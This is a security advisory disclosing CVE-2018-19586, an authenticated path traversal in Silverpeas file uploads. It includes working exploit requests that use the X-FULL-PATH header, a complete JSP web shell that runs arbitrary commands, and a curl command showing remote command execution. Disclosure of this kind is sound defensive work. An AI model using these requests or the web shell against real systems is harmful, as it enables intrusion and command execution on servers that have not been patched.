Tune into our first episode of Tool Talk: a how-to series for hackers. REGISTER ›

Silverpeas 5.15 To 6.0.2: Path Traversal

Critical Risk Advisory Featured

Share

Product Description

From the vendor’s website:

“Silverpeas is an open source WEB platform that improves the collaboration between the actors of a company or organization.” Silverpeas is widely used by many notable French organizations including those in the media, retail, and government space. 

Vulnerabilities List

One vulnerability was identified within the Silverpeas 5.15 to 6.0.2 application. 

Affected Versions

5.15 to 6.0.2

Solution

If you are using the affected versions of the Silverpeas software, please ensure you have the following mitigations installed: 

 

Path Traversal

Silverpeas 5.15 to 6.0.2 is affected by an authenticated path traversal vulnerability that can be triggered during file uploads. This vulnerability enables regular users to write arbitrary files on the underlying system with the privileges of the user running the application. An attacker may leverage the vulnerability to write an executable JSP file in an exposed web directory and execute commands on the underlying system.

Vulnerability Details

CVE ID: CVE-2018-19586

Access Vector: Remote 

Security Risk: Critical 

Vulnerability: CWE-23

CVSS Base Score: 9.9

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

The path traversal vulnerability is located in an upload mechanism that is reachable across several other features (e.g., forum, ideas) with regular user privileges. The application takes the upload path from the HTTP header without proper sanitization:

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../../../../../../tmp/test.png

FILE CONTENT

Figure 1 File upload with path traversal payload

The file is then created in /tmp:

root@vulns:/tmp# ls -lah | grep -i test

-rw-r--r--  1 root root  201 nov.  16 02:53 test.png

By default, files are uploaded to $SILVERPEAS_HOME/data/temp/[UUID]/, which is outside the application’s main directory. Through the use of the Silverpeas official installer, the core package (containing main Java classes and JSP files) is deployed in a virtual file system (VFS) whose path is randomized and not writable. However, the installer ships another web application resource (WAR) that is reachable under /weblib/ and whose path is not randomized.

The request below can be used to deploy a malicious JSP file:

POST /silverpeas/services/fileUpload HTTP/1.1
Host: vulns.lan:8000
…omitted for brevity…
Content-Type: application/octet-stream
X-FULL-PATH: ../../web/weblib.war/Aurora/css/webshell.jsp
…omitted for brevity…

<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"\n"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<%=output %>

Figure 2 - Web shell upload

Command execution can then be achieved by using the deployed file, highlighted below:

$ curl 'http://vulns.lan:8000/weblib/Aurora/css/webshell.jsp?cmd=ls'

appclient
bin
copyright.txt
docs
domain
jboss-modules.jar
LICENSE.txt
modules
README.txt
standalone
welcome-content

Figure 3 - Successful command execution with deployed web shell

The issue is due to a lack of user-input sanitization in the FileUploadData Java class. For more information, see:

Disclosure Timeline: 

  • 11/10/2018: Initial discovery for version 6.0.2
  • 11/26/2018: Initial notification of product vendor
  • 12/01/2018: Versions 5.15 to 6.0.2 discovered to be affected
  • 12/14/2018: Patches released for 5.15 and 6.0 

Researcher:

Bastien Faure, Security Associate at Bishop Fox


Bastien faure

About the author, Bastien Faure

Senior Security Consultant

Bastien Faure (CEI, CEH) is a Senior Security Consultant at Bishop Fox. In this role, he focuses on internal penetration testing, source code review, red teaming, and web application assessments. Bastien is an active member of the security research community and has discovered CVE-2014-2223 and CVE-2018-19586. He has also created numerous assessment tools, including an in-depth LDAP enumeration tool, a penetration test companion, and an HTTP exploitation tool.

More by Bastien

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.